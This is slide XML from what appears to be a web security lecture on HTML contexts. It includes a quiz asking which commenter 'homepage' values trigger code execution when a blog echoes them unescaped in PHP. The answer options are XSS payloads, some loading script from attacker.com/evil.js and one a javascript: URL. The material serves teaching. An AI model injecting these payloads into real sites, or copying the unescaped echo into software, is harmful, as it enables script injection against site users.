              <a:t>"'&gt;Home&lt;/a&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8388095" y="24881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CF8E2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336031" y="3000247"/>
            <a:ext cx="1297092" cy="254557"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDFBF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="847">
              <a:lnSpc>
                <a:spcPts val="1933"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$homepage</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="2841685"/>
            <a:ext cx="10522373" cy="428387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5975624" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Which</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cause</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>execution?</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="3689096"/>
            <a:ext cx="60960" cy="331893"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="45720" h="248919">
                <a:moveTo>
                  <a:pt x="45720" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="248412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45720" y="248412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45720" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDFBF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="3970731"/>
            <a:ext cx="8956040" cy="1195860"/>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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/attacker.com/evil.js</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://attacker.com/evil.js"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>javascript:alert("evil</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>executing");</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>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568" y="450638"/>
            <a:ext cx="4631267" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-120" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="731520" y="2488184"/>
            <a:ext cx="7657253" cy="307339"/>
            <a:chOff x="548640" y="1866138"/>
            <a:chExt cx="5742940" cy="230504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="548640" y="1866138"/>
              <a:ext cx="243840" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="243840" h="230505">
                  <a:moveTo>
                    <a:pt x="243840" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCF8E2"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792480" y="1866137"/>
              <a:ext cx="5131435" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="733031" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611124" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611124" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733031" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733031" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="2077199" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1709928" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222248" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733044" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733044" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222248" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709928" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077199" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077199" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="5131308" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDFBF5"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5923787" y="1866138"/>
              <a:ext cx="367665" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="367664" h="230505">
                  <a:moveTo>
                    <a:pt x="367284" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367284" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367284" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCF8E2"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1622551"/>
            <a:ext cx="10049933" cy="1161280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> blogging</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>accepts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13"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‘homepage’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>anonymous </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-579" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>commenter.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> The application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>display</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>helpful</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>link:</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2485"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href='"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$homepage</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"'&gt;Home&lt;/a&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
